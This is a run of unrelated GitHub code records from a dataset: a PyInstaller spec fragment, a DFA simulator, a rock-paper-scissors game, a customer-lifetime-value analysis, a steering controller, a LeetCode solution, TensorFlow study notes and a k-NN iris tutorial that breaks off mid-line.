\"/Users/ahmetcan.solak/Dev/AhmetCanSolak/aydin/aydin/gui/resources/biohub_logo.png\", 'DATA')]\n\npyz = PYZ(a.pure)\nexe = EXE(pyz,\n a.scripts,\n exclude_binaries=1,\n # a.binaries,\n # a.zipfiles,\n # a.datas,\n name='aydin',\n debug=False,\n #debug=True,\n strip=None,\n upx=True,\n console=True )\n\napp = BUNDLE(exe,\n name='aydin.app',\n upx=True,\n icon=None)\n\n\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=False,\n upx=True,\n name='aydin')\n","repo_name":"royerlab/aydin","sub_path":"build/osx/aydin.spec","file_name":"aydin.spec","file_ext":"spec","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"3"} +{"seq_id":"19541198984","text":"with open(\"automat.txt\", \"r\") as f:\r\n stare_initiala = 'q0'\r\n tranzitii = {}\r\n stari_acceptate = []\r\n stari_finale = []\r\n cuvant = ''\r\n lines=f.readlines()\r\n ok=1\r\n for line in lines:\r\n if ok<=len(lines)-2:\r\n q1, simbol, q2 = line.strip().split()\r\n tranzitii[(q1, simbol)] = q2\r\n stari_acceptate.append(q2)\r\n stari_acceptate.append(q1)\r\n ok+=1\r\n else:\r\n if ok==len(lines)-1:\r\n for q in line.strip().split():\r\n stari_finale.append(q)\r\n ok=len(lines)\r\n else:\r\n cuvant = line.split()\r\n stari_acceptate = set(stari_acceptate)\r\n stari_acceptate = list(stari_acceptate)\r\n stari_finale = set(stari_finale)\r\n stari_finale = list(stari_finale)\r\n\r\ndef DFA(cuvant):\r\n drumul_parcurs = []\r\n stare_curenta = stare_initiala\r\n cuvant = list(cuvant[0])\r\n for litera in cuvant:\r\n if (stare_curenta, litera) not in tranzitii:\r\n return False\r\n drumul_parcurs.append(stare_curenta)\r\n stare_curenta = tranzitii[(stare_curenta, litera)]\r\n if stare_curenta in stari_finale:\r\n drumul_parcurs.append(stare_curenta)\r\n return drumul_parcurs\r\n else:\r\n return False\r\n\r\nwith open(\"final.txt\", \"w\") as f:\r\n if cuvant == []:\r\n if 'q0' in stari_finale:\r\n f.write(\"Acceptat\")\r\n else:\r\n f.write(\"Neacceptat\")\r\n else:\r\n if DFA(cuvant) == False:\r\n f.write(\"Neacceptat\")\r\n else:\r\n f.write(\"Acceptat\")\r\n f.write(\"\\n\")\r\n raspuns=DFA(cuvant)\r\n for r in raspuns:\r\n f.write(r)\r\n f.write(\" \")\r\n","repo_name":"TeonaB/Limbaje-formale-si-automate","sub_path":"Project1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9692253486","text":"#A game of rock, paper, scissors with an ongoing scoreboard and repeating indefinitely\n\nimport random\n\nchoices = ('rock','paper','scissors')\nplayer_score = int(0)\ncomputer_score = int(0)\ncurrent_winner = 'a draw'\nrepeat = True\nfirst_game = True\n\nname = input(\"Welcome! What's your name?\")\nprint(f'Hello {name}!')\n\ndef play_game(your_choice, my_choice) :\n global player_score\n global computer_score\n print(f'You chose {your_choice}. Nice choice!\\nI chose {my_choice}.')\n if your_choice == 'rock' and my_choice == 'scissors' :\n print(f'Rock blunts scissors. {name} wins!')\n player_score += 1\n if your_choice == 'rock' and my_choice == 'paper' :\n print('Paper wraps rock. I win!')\n computer_score += 1\n if your_choice == 'scissors' and my_choice == 'rock' :\n print('Rock blunts scissors. I win!')\n computer_score += 1\n if your_choice == 'scissors' and my_choice == 'paper' :\n print(f'Scissors cut paper. {name} wins!')\n player_score += 1\n if your_choice == 'paper' and my_choice == 'rock' :\n print(f'Paper wraps rock. {name} wins!')\n player_score += 1\n if your_choice == 'paper' and my_choice == 'scissors' :\n print(f'Scissors cut paper. I win!')\n computer_score += 1\n elif your_choice == my_choice :\n print(f\"You chose {your_choice}, and I chose {my_choice}. It's a draw!\")\n \n if first_game == False :\n calculate_score()\n\ndef make_choice() :\n print('--------------------------------------------')\n player_choice = input(str(f'Please choose one: {choices} '))\n computer_choice = random.choice(choices)\n\n while not player_choice in choices :\n print(f\"Hey, no cheating! You chose '{player_choice}' which isn't a valid choice.\")\n player_choice = input(str(f'Please make another choice from {choices}'))\n print(player_choice) \n \n play_game(player_choice, computer_choice)\n \n\nif first_game == True :\n make_choice()\n\ndef calculate_score() :\n print(f\"The score is:\\n{name}: {player_score}\\nMe: {computer_score}\")\n\n if player_score > computer_score : \n current_winner = name \n elif computer_score > player_score : \n current_winner = 'me' \n elif player_score == computer_score : \n current_winner = 'a tie'\n \n global first_game\n first_game = False\n\n print(f\"The current winner is {current_winner}! Shall we play again?\")\n make_choice()\n\nif first_game == True :\n calculate_score()","repo_name":"charlottemothersole/games","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39832759463","text":"#BUSINESS PROBLEM\n\n#FLO is one of the biggest shoes and clothing company wants to determine roadmap for sales and marketing.\n#The potential value that existing customers will provide to the company in the future so that the company can make\n#a medium-long-term plan needs to be estimated.\n\n#Data preparation\n\ndf_ = pd.read_csv(\"/Users/birsenbayat/Desktop/miuul/PythonProgrammingForDataScience/CRM_Analitigi/FLOCLTVPrediction/flo_data_20k.csv\")\ndf = df_.copy()\n\nimport datetime as dt\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom lifetimes import BetaGeoFitter\nfrom lifetimes import GammaGammaFitter\nfrom lifetimes.plotting import plot_period_transactions\npd.set_option('display.max_columns', None)\npd.set_option(\"display.width\", 500)\n# pd.set_option('display.max_rows', None)\npd.set_option('display.float_format', lambda x: '%.3f' % x)\n\n#Define the outlier_thresholds and replace_with_thresholds functions needed to suppress outliers\n\ndef outlier_thresholds(dataframe, variable):\n quartile1 = dataframe[variable].quantile(0.01)\n quartile3 = dataframe[variable].quantile(0.99)\n interquantile_range = quartile3 - quartile1\n up_limit = quartile3 + 1.5 * interquantile_range\n low_limit = quartile1 - 1.5 * interquantile_range\n return round(low_limit), round(up_limit)\n\ndef replace_with_thresholds(dataframe, variable):\n low_limit, up_limit = outlier_thresholds(dataframe, variable)\n # dataframe.loc[(dataframe[variable] < low_limit), variable] = low_limit\n dataframe.loc[(dataframe[variable] > up_limit), variable] = up_limit\n\n#if \"order_num_total_ever_online\", \"order_num_total_ever_offline\", \"customer_value_total_ever_offline\",\n#\"customer_value_total_ever_online\" columns have outliers, suppress them\n\ndf.describe().T\n\nreplace_with_thresholds(df, \"order_num_total_ever_online\")\nreplace_with_thresholds(df, \"order_num_total_ever_offline\")\nreplace_with_thresholds(df, \"customer_value_total_ever_offline\")\nreplace_with_thresholds(df, \"customer_value_total_ever_online\")\n\n#when we look at the data describe, we saw that there was outliers because max and std values changed\n\n#Omnichannel means that customers shop from both online and offline platforms.\n#We will create new variables for the total number of purchases and spend of each customer\n\ndf[\"order_num_total\"] = df[\"order_num_total_ever_online\"] + df[\"order_num_total_ever_offline\"]\ndf[\"customer_value_total\"] = df[\"customer_value_total_ever_online\"] + df[\"customer_value_total_ever_offline\"]\n\n\n#We will examine the variable types and convert the type of variables that express dates to date.\n\ndf.dtypes\ndf[\"first_order_date\"] = df[\"first_order_date\"].apply(pd.to_datetime)\ndf[\"last_order_date\"] = df[\"last_order_date\"].apply(pd.to_datetime)\ndf[\"last_order_date_online\"] = df[\"last_order_date_online\"].apply(pd.to_datetime)\ndf[\"last_order_date_offline\"] = df[\"last_order_date_offline\"].apply(pd.to_datetime)\n\n#Creating the CLTV Data Structure\n\ndf[\"last_order_date\"].max()\ntoday_date = dt.datetime(2021, 6, 1)\n\ndf[\"recency\"] = (df[\"last_order_date\"] - df[\"first_order_date\"]).dt.days\n\ncltv = df.groupby(\"master_id\").agg({\"recency\": \"sum\",\n \"first_order_date\": lambda x: (today_date - x).dt.days,\n \"order_num_total\": \"sum\",\n \"customer_value_total\": \"sum\"})\n\ncltv.columns =[\"recency_cltv_weekly\", \"T_weekly\", \"frequency\", \"monetary_cltv_avg\"]\n\ncltv[\"recency_cltv_weekly\"] = cltv[\"recency_cltv_weekly\"] / 7\ncltv[\"T_weekly\"] = cltv[\"T_weekly\"] / 7\ncltv[\"monetary_cltv_avg\"] = cltv[\"monetary_cltv_avg\"] / cltv[\"frequency\"]\ncltv = cltv[cltv[\"frequency\"]>1]\ncltv.head()\ncltv.shape\n\n\n#Creating of BG/NBD, Gamma-Gamma Models and Calculation of CLTV\n#Fit BG/NBD model\n\nbgf = BetaGeoFitter(penalizer_coef=0.001)\nbgf.fit(cltv[\"frequency\"],\n cltv[\"recency_cltv_weekly\"],\n cltv[\"T_weekly\"])\n\n#We will estimate expected purchases from customers within 3 months and add exp_sales_3_month to cltv dataframe\ncltv[\"expected_purc_3_month\"] = bgf.conditional_expected_number_of_purchases_up_to_time(12,\n cltv[\"frequency\"],\n cltv[\"recency_cltv_weekly\"],\n cltv[\"T_weekly\"])\n\n#We will estimate expected purchases from customers within 6 months and add exp_sales_6_month to cltv dataframe\ncltv[\"expected_purc_6_month\"] = bgf.conditional_expected_number_of_purchases_up_to_time(24,\n cltv[\"frequency\"],\n cltv[\"recency_cltv_weekly\"],\n cltv[\"T_weekly\"])\n\n\n#Fit Gamma-Gamma model. We will estimate the average value of the customers and add it to the cltv dataframe as exp_average_value.\nggf = GammaGammaFitter(penalizer_coef=0.01)\nggf.fit(cltv['frequency'], cltv[\"monetary_cltv_avg\"])\n\ncltv[\"expected_average_value\"] = ggf.conditional_expected_average_profit(cltv['frequency'],\n cltv[\"monetary_cltv_avg\"])\n\n#Calculating cltv for 6 month and adding cltv dataframe\nCLTV = ggf.customer_lifetime_value(bgf,\n cltv['frequency'],\n cltv[\"recency_cltv_weekly\"],\n cltv[\"T_weekly\"],\n cltv[\"monetary_cltv_avg\"],\n time=6, # 6 aylık\n freq=\"W\", # T'nin frekans bilgisi.\n discount_rate=0.01)\n\nCLTV = CLTV.reset_index()\nCLTV.head()\n\ncltv_final = cltv.merge(CLTV, on=\"master_id\", how=\"left\")\ncltv_final.sort_values(by=\"clv\", ascending=False).head(20)\n\n\n#Creating Segments by CLTV Value\n\ncltv_final[\"segment\"] = pd.qcut(cltv_final[\"clv\"], 4, labels=[\"D\", \"C\", \"B\", \"A\"])\n\n\n#comment: action recommendations for next 6 month\n#The recency and age of the #A segment are lower than the other segments, and the frequencies are higher.\n#Besides, the number of transactions it will make in 6 months and the average benefit it will bring seems higher.\n#For this segment, which seems to provide the company with an average of 362,316 and a total of 1806505,089 revenues in a 6-month period,\n#We can offer special campaigns that will increase the #purchasing rate, mentioning that there are special campaigns via e-mail and\n#appealing to the customer, We need to take actions that will make you feel special and encourage shopping.\n\n#B segment also goes close to the A segment. However, the C segment is not in a bad place in terms of shopping frequency and the benefit\n#it will bring. Regular reminders can be made in order not to disturb the shopping routine, so as not to lose the C segment and preserve\n#the situation. Categories of interest can be analyzed and information can be given in that direction.","repo_name":"Birsenn/FLO_CRM_Analytics","sub_path":"FLO_CLTV_Analysis & Prediction.py","file_name":"FLO_CLTV_Analysis & Prediction.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28742610215","text":"import numpy as np\n\n\nclass Controller:\n \"\"\"Linear controller for the steering wheel\"\"\"\n\n def __init__(\n self, qsi: float, w_n: float, v_ref: float, w_ref: float, h: float, L: float\n ):\n \"\"\"\n Parameters\n ----------\n qsi: float\n Damping Ratio\n w_n: float\n Natural Frequency\n v_ref: float\n Linear velocity reference (km/h)\n w_ref: float\n Steering wheel velocity reference\n h: float\n Integration Step\n L: float\n Car dimension\n \"\"\"\n\n self.qsi = qsi\n self.w_n = w_n\n self.v_ref = v_ref / 3.6 # m/s\n self.w_ref = w_ref\n self.kv = 2 * qsi * w_n\n self.ks = self.kv\n self.ki = (w_n**2 - w_ref**2) / abs(self.v_ref)\n self.h = h\n self.L = L\n self.last_error = np.zeros((3, 1))\n\n def print_parameters(self):\n \"\"\"\n Print parameters of the controller\n \"\"\"\n print(\n f\"\"\"\n\n qsi value: {self.qsi}\n w_n value: {self.w_n}\n v_ref value: {self.v_ref} m/s\n w_ref value: {self.w_ref}\n kv value: {self.kv}\n ks value: {self.ks}\n ki value: {self.ki}\n h value: {self.h}\n L value: {self.L}\n Closed Loop poles of the system {self.poles()}\n\n \"\"\"\n )\n\n def following_trajectory(self, ref: np.array, position: np.array) -> np.array:\n \"\"\"\n Computes next position and control signal given the current position and the next point using the linear controller\n\n Inputs:\n -ref: a numpy array with dimensions 4x1 (x_ref,y_ref,theta_ref_phi_ref) of planned trajectory\n Outputs:\n -position : next position\n -np.array([v,ws]): control signal\n \"\"\"\n error = np.zeros((3, 1))\n w_ref = np.sin(ref[3]) * self.v_ref / self.L\n world_error = ref[:-1] - position[:-1]\n bot_error = np.matmul(\n np.array(\n [\n [np.cos(position[2]), np.sin(position[2]), 0],\n [-np.sin(position[2]), np.cos(position[2]), 0],\n [0, 0, 1],\n ]\n ),\n world_error,\n )\n bot_error = bot_error[:, np.newaxis]\n u = np.array(\n [\n -self.kv * self.last_error[0],\n -self.ki * self.last_error[1] - self.ks * self.last_error[2],\n ]\n )\n error_dynamics = (\n np.array(\n [[0, w_ref, 0], [-w_ref, 0, self.v_ref * np.cos(ref[3])], [0, 0, 0]]\n )\n @ bot_error\n + np.array([[np.cos(ref[3]), 0], [0, 0], [0, 1]]) @ u\n )\n error = bot_error + self.h * error_dynamics\n v = self.kv * error[0]\n if v > 10:\n v = [10]\n ws = self.ki * error[1] + self.ks * error[2]\n self.last_error = error\n return np.array([v, ws]).reshape((2,))\n\n def following_reference(self, ref: np.array, num_points: int = None) -> np.array:\n \"\"\"\n Gives trajectory followed by the model using this kind of Controller\n\n Inputs:\n -ref: a numpy array with dimensions 3xK (x_ref,y_ref,theta_ref) where K is the number of points to compute\n -num_points : a integer that expresses the number of points of trajectory vector (time_simulation*h)\n Outputs:\n -trajectory: a numpy array with dimensions 4xK (x,y,theta,phi) followed by the car model\n \"\"\"\n if num_points != None:\n trajectory = np.zeros((ref.shape[0] + 1, min(ref.shape[1], num_points)))\n else:\n trajectory = np.zeros((ref.shape[0] + 1, ref.shape[1]))\n\n for k in range(trajectory.shape[1] - 1):\n world_error = ref[:, k] - trajectory[:-1, k]\n bot_error = np.matmul(\n np.array(\n [\n [np.cos(trajectory[2, k]), np.sin(trajectory[2, k]), 0],\n [-np.sin(trajectory[2, k]), np.cos(trajectory[2, k]), 0],\n [0, 0, 1],\n ]\n ),\n world_error,\n )\n v = self.kv * bot_error[0]\n ws = self.ki * bot_error[1] + self.ks * bot_error[2]\n derivative = np.array(\n [\n [np.cos(trajectory[2, k]), 0],\n [np.sin(trajectory[2, k]), 0],\n [np.tan(trajectory[3, k]) / self.L, 0],\n [0, 1],\n ]\n )\n trajectory[:, k + 1] = trajectory[:, k] + self.h * np.matmul(\n derivative, np.array([v, ws])\n )\n if abs(trajectory[3, k + 1]) > np.pi / 8:\n trajectory[3, k + 1] = np.sign(trajectory[3, k + 1]) * np.pi / 8\n return trajectory\n\n def poles(self):\n \"\"\"\n Compute closed loop poles of the system\n \"\"\"\n poles, _ = np.linalg.eig(\n np.array([[0, self.w_ref, 0], [-self.w_ref, 0, self.v_ref], [0, 0, 0]])\n - np.matmul(\n np.array([[1, 0], [0, 0], [0, 1]]),\n np.array([[self.kv, 0, 0], [0, self.ki, self.ks]]),\n )\n )\n return poles\n\n\nif __name__ == \"__main__\":\n from matplotlib import pyplot as plt\n from scipy import signal\n\n # Examples of trajectories\n\n x_ref = np.arange(0, 50, 0.01)\n\n y_ref_traj = [\n np.cos(0.02 * x_ref),\n signal.square(2 * np.pi * 0.02 * x_ref),\n np.zeros(x_ref.shape) + 1,\n ]\n\n t_simulation = 10\n L = 2.2\n h = 0.01\n qsi = 1\n w_n = 10\n v_ref = 36 # km/h\n w_ref = 4\n num_points = int(t_simulation / h)\n simulation = Controller(qsi=qsi, w_n=w_n, v_ref=v_ref, w_ref=w_ref, h=h, L=L)\n simulation.print_parameters()\n for y_ref in y_ref_traj:\n teta_ref = np.zeros(y_ref.shape)\n for k in range((y_ref.shape[0]) - 1):\n teta_ref[k] = np.arctan2(y_ref[k + 1] - y_ref[k], x_ref[k + 1] - x_ref[k])\n\n Ref = np.array([[x_ref], [y_ref], [teta_ref]])\n Ref = Ref.reshape(Ref.shape[0], Ref.shape[2])\n\n trajectory = simulation.following_reference(ref=Ref, num_points=None)\n plt.figure()\n plt.xlabel(\"x axis caption\")\n plt.ylabel(\"y axis caption\")\n plt.plot(trajectory[0, :], trajectory[1, :])\n plt.plot(Ref[0, :], Ref[1, :])\n\n plt.figure()\n plt.plot(trajectory[2, :])\n\n plt.show()\n","repo_name":"TiagoLourinho/autonomous-car","sub_path":"source/blocks/linear_controller.py","file_name":"linear_controller.py","file_ext":"py","file_size_in_byte":6603,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"31934830526","text":"# As the ruler of a kingdom, you have an army of wizards at your command.\n# You are given a 0-indexed integer array strength, where strength[i] denotes the strength of the ith wizard. For a contiguous group of wizards (i.e. the wizards' strengths form a subarray of strength), the total strength is defined as the product of the following two values:\n# - The strength of the weakest wizard in the group.\n# - The total of all the individual strengths of the wizards in the group.\n# Return the sum of the total strengths of all contiguous groups of wizards. Since the answer may be very large, return it modulo 109 + 7.\n# strength subarray is a contiguous non-empty sequence of elements within an array.\n#\n# Example 1:\n#\n# Input: strength = [1,3,1,2]\n# Output: 44\n# Explanation: The following are all the contiguous groups of wizards:\n# - [1] from [1,3,1,2] has a total strength of min([1]) * sum([1]) = 1 * 1 = 1\n# - [3] from [1,3,1,2] has a total strength of min([3]) * sum([3]) = 3 * 3 = 9\n# - [1] from [1,3,1,2] has a total strength of min([1]) * sum([1]) = 1 * 1 = 1\n# - [2] from [1,3,1,2] has a total strength of min([2]) * sum([2]) = 2 * 2 = 4\n# - [1,3] from [1,3,1,2] has a total strength of min([1,3]) * sum([1,3]) = 1 * 4 = 4\n# - [3,1] from [1,3,1,2] has a total strength of min([3,1]) * sum([3,1]) = 1 * 4 = 4\n# - [1,2] from [1,3,1,2] has a total strength of min([1,2]) * sum([1,2]) = 1 * 3 = 3\n# - [1,3,1] from [1,3,1,2] has a total strength of min([1,3,1]) * sum([1,3,1]) = 1 * 5 = 5\n# - [3,1,2] from [1,3,1,2] has a total strength of min([3,1,2]) * sum([3,1,2]) = 1 * 6 = 6\n# - [1,3,1,2] from [1,3,1,2] has a total strength of min([1,3,1,2]) * sum([1,3,1,2]) = 1 * 7 = 7\n# The sum of all the total strengths is 1 + 9 + 1 + 4 + 4 + 4 + 3 + 5 + 6 + 7 = 44.\n#\n# Example 2:\n#\n# Input: strength = [5,4,6]\n# Output: 213\n# Explanation: The following are all the contiguous groups of wizards:\n# - [5] from [5,4,6] has a total strength of min([5]) * sum([5]) = 5 * 5 = 25\n# - [4] from [5,4,6] has a total strength of min([4]) * sum([4]) = 4 * 4 = 16\n# - [6] from [5,4,6] has a total strength of min([6]) * sum([6]) = 6 * 6 = 36\n# - [5,4] from [5,4,6] has a total strength of min([5,4]) * sum([5,4]) = 4 * 9 = 36\n# - [4,6] from [5,4,6] has a total strength of min([4,6]) * sum([4,6]) = 4 * 10 = 40\n# - [5,4,6] from [5,4,6] has a total strength of min([5,4,6]) * sum([5,4,6]) = 4 * 15 = 60\n# The sum of all the total strengths is 25 + 16 + 36 + 36 + 40 + 60 = 213.\n#\n# Constraints:\n#\n# 1 <= strength.length <= 10^5\n# 1 <= strength[i] <= 10^9\n\n\n# https://leetcode.com/problems/sum-of-total-strength-of-wizards/discuss/2061985/JavaC%2B%2BPython-One-Pass-Solution\n# Time O(n)\n# Space O(n)\n#\n# Key words\n# Subarray + sum -> prefix sum\n# Subarray + minimum -> mono stack\n#\n#\n# Intuition\n# Assume A[i] is the leftmost smallest element in a subarray,\n# calculate each A[i] contribution\n#\n#\n# Explanation\n# 1. Find next small on the right\n# 2. Find next small or equal on the left.\n# 3. For each strength[i] as the minimum, find the possible subarray sums.\nfrom itertools import accumulate\n\n\nclass Solution:\n def totalStrength(self, strength: List[int]) -> int:\n n = len(strength)\n\n # indices of next small on the right\n right = [n] * n\n st = []\n for i in range(n):\n print(\"stack[-1]\", stack[-1], strength[stack[-1]], strength[i])\n while st and strength[st[-1]] > strength[i]:\n right[st.pop()] = i\n st.append(i)\n\n # indices of next small on the left\n left = [-1] * n\n st = []\n for i in range(n - 1, -1, -1):\n while st and strength[st[-1]] >= strength[i]:\n left[st.pop()] = i\n st.append(i)\n\n # for each strength[i] as minimum, calculate sum\n res = 0\n acc = list(accumulate(accumulate(strength), initial=0))\n for i in range(n):\n l, r = left[i], right[i]\n lacc = acc[i] - acc[max(l, 0)]\n racc = acc[r] - acc[i]\n ln, rn = i - l, r - i\n res += strength[i] * (racc * ln - lacc * rn)\n return res % 10 ** 9 + 7\n","repo_name":"hongbo-miao/leetcode","sub_path":"Python/2281. Sum of Total Strength of Wizards.py","file_name":"2281. Sum of Total Strength of Wizards.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","stars":197,"dataset":"github-code","pt":"3"} +{"seq_id":"71583680721","text":"'''\r\n第4章 深层神经网络\r\n 4.1 深度学习与深层神经网络\r\n 1、深度学习两个重要特性是多层和非线性。\r\n 2、分类问题中,交叉熵作为损失函数,衡量的是两个概率分布之间的距离。\r\n 3、回归问题中,最常用的是损失函数是均方误差MSE。均方误差在分类中也经常使用���\r\n\r\n'''\r\n\r\nimport tensorflow as tf\r\n#tf.greater函数和tf.select函数的用法\r\nv1 = tf.constant([1.0,2.0,3.0,4.0])\r\nv2 = tf.constant([4.0,3.0,2.0,1.0])\r\nsess = tf.InteractiveSession()\r\nprint(tf.greater(v1,v2).eval())\r\nprint(tf.where(tf.greater(v1,v2),v1,v2).eval())\r\n\r\n#简单的神经网络讲解损失函数对模型训练结果的影响\r\n\r\nimport tensorflow as tf\r\nfrom numpy.random import RandomState\r\nbatch_size = 8\r\nx = tf.placeholder(tf.float32,shape=(None,2),name='x-input')\r\ny_ = tf.placeholder(tf.float32,shape=(None,1),name='y-input')\r\n\r\nw1 = tf.Variable(tf.random_normal([2,1],stddev=1,seed=1))\r\ny = tf.matmul(x,w1)\r\n\r\nloss_less = 10\r\nloss_more = 1\r\nloss = tf.reduce_sum(tf.where(tf.greater(y,y_),\r\n (y - y_)*loss_more,\r\n (y_ - y)*loss_less))\r\ntrain_step = tf.train.AdamOptimizer(0.001).minimize(loss)\r\n\r\nrdm = RandomState(1)\r\ndataset_size = 128\r\nX = rdm.rand(dataset_size,2)\r\nY = [[x1 + x2 + rdm.rand()/10.0-0.05] for (x1,x2) in X]\r\n\r\nwith tf.Session() as sess:\r\n init_op = tf.global_variables_initializer()\r\n sess.run(init_op)\r\n STEPS = 5000\r\n for i in range(STEPS):\r\n start = (i*batch_size) % dataset_size\r\n end = min(start+batch_size,dataset_size)\r\n sess.run(train_step,\r\n feed_dict={x:X[start:end],y_:Y[start:end]})\r\n print(sess.run(w1))\r\n\r\n'''\r\n4.3 神经网络优化算法\r\n 1、梯度下降法主要用于单个参数的取值。\r\n 2、反向传播算法在所有参数上使用梯度下降算法。\r\n 3、梯度下降法存在的问题:1、参数的初始值很大程度上影响最后的结果,\r\n 只有放损失函数是凸函数时,梯度下降法才能保证达到全局最优解;\r\n 2、计算时间太长,因为要在全部训练数据上最小化损失。\r\n 4、为了加快训练速度,随机梯度下降法,每一轮迭代中,随机优化某一条\r\n 训练数据上的损失函数。 SGD的问题是,可能无法达到局部最优。\r\n'''\r\n\r\n'''\r\nTensorflow实现神经网络过程\r\nbatch_size = n\r\nx = tf.placeholder(tf.float32,shape=(batch_size,2),name='x-input')\r\ny_ = tf.placeholder(tf.float32,shape=(batch_size,1),name='y-input')\r\nloss =\r\ntrain_step = tf.train.AdamOptimizer(0.001).minimize(loss)\r\nwith tf.Session() as sess:\r\n for i in range(STEPS):\r\n current_X,current_Y=\r\n sess.run(train_step,feed_dict={x:current_X,y_:current_Y})\r\n'''\r\n\r\n'''\r\n4.4 神经网络进一步优化\r\n 1、通过指数衰减方法设置梯度下降算法中的学习率,既可以在模型训练前期快速\r\n 接近较优解,又可以保证模型在训练后期不会有太大波动。\r\n 2、过拟合问题。\r\n 3、滑动平均模型。滑动平均模型将每一轮得到的模型综合起来,从而得到最终的\r\n 模型更加健壮。\r\n'''\r\n\r\nglobal_step = tf.Variable(0)\r\nlearning_rate = tf.train.exponential_decay(\r\n 0.1,global_step,100,0.96,staircase=True)\r\n\r\n'''\r\n4.4.2 过拟合问题\r\n 1、过拟合指的是当一个模型过于复杂之后,它可以很好的记忆每一个训练数据中\r\n 随机噪音的部分而忘记要去学习训练数据中通用的趋势。\r\n 2、避免过拟合问题,正则化,正则化的思想是在损失函数中加入刻画模型复杂程度的指标。\r\n 3、L1正则化会让参数变得更加稀疏,即让更多参数变为0,打到类似特征选取的功能;\r\n L2正则化会让参数变得很小。\r\n L1正则化的计算公式不可导,L2正则化公式可导。\r\n'''\r\n#带L2正则化的损失函数定义\r\nw = tf.Variable(tf.random_normal([2,1],stddev=1,seed=1))\r\ny = tf.matmul(x,w)\r\n#loss = tf.reduce_mean(tf.square(y_-y)) + tf.contrib.layers.l2_regularizer(lambda)(w)\r\n\r\n\r\nweights = tf.constant([[1.0,-2.0],[-3.0,4.0]])\r\nwith tf.Session() as sess:\r\n print(sess.run(tf.contrib.layers.l1_regularizer(.5)(weights)))\r\n print(sess.run(tf.contrib.layers.l2_regularizer(.5)(weights)))\r\n\r\n\r\n#通过集合计算5层神经网络带L2正则化的损失函数的计算方式\r\nimport tensorflow as tf\r\n'''\r\ndef get_weight(shape,lambda):\r\n var = tf.Variable(tf.random_normal(shape),dtype=tf.float32)\r\n tf.add_to_collection('losses',tf.contrib.layers.l2_regularizer(lambda)(var))\r\n return var\r\n'''\r\n\r\nx = tf.placeholder(tf.float32,shape=(None,2))\r\ny_ = tf.placeholder(tf.float32,shape=(None,1))\r\nbatch_size = 8\r\nlayer_dimension = [2,10,10,10,1]\r\nn_layers = len(layer_dimension)\r\n\r\ncur_layer = x\r\nin_dimension = layer_dimension[0]\r\n\r\nfor i in range(i,n_layers):\r\n out_dimension = layer_dimension[i]\r\n #weight = get_weight([in_dimension,out_dimension],0.001)\r\n bias = tf.Variable(tf.constant(0.1,shape=[out_dimension]))\r\n cur_layer = tf.nn.relu(tf.matmul(cur_layer,weight) + bias)\r\n in_dimension = layer_dimension[i]\r\n\r\nmse_loss = tf.reduce_mean(tf.square(y_ - cur_layer))\r\ntf.add_to_collection('losses',mse_loss)\r\nloss = tf.add_n(tf.get_collection('losses'))\r\n\r\n#滑动平均模型\r\nimport tensorflow as tf\r\nv1 = tf.Variable(0,dtype=tf.float32)\r\nstep = tf.Variable(0,trainable=False)\r\n\r\nema = tf.train.ExponentialMovingAverage(0.99,step)\r\nmaintain_average_op = ema.apply([v1])\r\n\r\nwith tf.Session() as sess:\r\n init_op = tf.initialize_all_variables()\r\n sess.run(init_op)\r\n print(sess.run([v1,ema.average(v1)]))\r\n sess.run(tf.assign(v1,5))\r\n print(sess.run([v1,ema.average(v1)]))\r\n sess.run(tf.assign(step,10000))\r\n sess.run(tf.assign(v1,10))\r\n sess.run(maintain_average_op)\r\n print(sess.run([v1,ema.average(v1)]))\r\n sess.run(maintain_average_op)\r\n print(sess.run([v1,ema.average(v1)]))\r\n\r\n","repo_name":"XU-ZHOU/Tensorflow","sub_path":"Chapter4/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24138513983","text":"# http://machinelearningcoban.com/2017/01/08/knn/\n\nimport numpy as np\nimport matplotlib as plt\n\nfrom sklearn import neighbors, datasets\n\niris = datasets.load_iris()\niris_X = iris.data\niris_y = iris.target\n\nprint('Number of classes: %d' % len(np.unique(iris_y)))\nprint('Number of data of point: %d' % len(iris_y))\n\nX0 = iris_X[iris_y == 0,:]\nprint('Samples from class 0:\\n', X0[:5, :])\n\nX1 = iris_X[iris_y == 1, :]\nprint('Samples from class 1:\\n', X1[:5, :])\n\nX2 = iris_X[iris_y == 2, :]\nprint('Samples from class 2:\\n', X2[:5,:])\n\n# create training & test sets\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(iris_X, iris_y, test_size=50)\n\nprint(\"Training size : %d\" % len(y_train))\nprint(\"Test size : %d\" % len(y_test))\n\nclf = neighbors.KNeighborsClassifier(n_neighbors = 1, p = 2)\n# p = 2 --> norm 2\n# norm 1, 2 : http://machinelearningcoban.com/math/#norm0, http://machinelearningcoban.com/math/#norm2\nclf.fit(X_train, y_train)\ny_pred = clf.predict(X_test)\n\nprint(\"Print results for 20 test data points:\")\nprint(\"Predicted labels : \", y_pred[20:40])\nprint(\"Ground truth : \", y_test[20:40])\n\n# evaluation method\nfrom sklearn.metrics import accuracy_score\nprint(\"Accuracy of 1NN: %.2f %%\" %(100*accuracy_score(y_test, y_pred)))\n\n# major voting\nprint(\"-\" * 10 + \"major voting\" + \"-\" * 10)\nclf = neighbors.KNeighborsClassifier(n_neighbors = 10, p = 2)\nclf.fit(X_train, y_train)\ny_pred = clf.predict(X_test)\n\nprint(\"Accuracy of 10NN with major voting: %.2f %%\" %(100*accuracy_score(y_test, y_pred)))\n\n# distance weights\nprint(\"-\" * 10 + \"distnace weights\")\nclf = 